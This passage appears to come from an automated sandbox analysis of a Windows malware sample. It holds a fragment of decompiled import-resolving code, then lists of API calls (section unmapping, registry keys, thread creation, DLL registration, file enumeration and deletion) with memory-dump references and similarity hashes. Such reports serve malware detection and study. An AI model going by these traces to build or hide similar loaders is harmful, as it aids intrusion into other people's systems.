						 *(_v8 + _t46) = _v4; /* store the resolved address in the IAT */
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; /* ERROR_PROC_NOT_FOUND */
						goto L19;
					}
					_t27 = _t35; /* no OriginalFirstThunk: walk the IAT itself */
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; /* ERROR_MOD_NOT_FOUND */
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
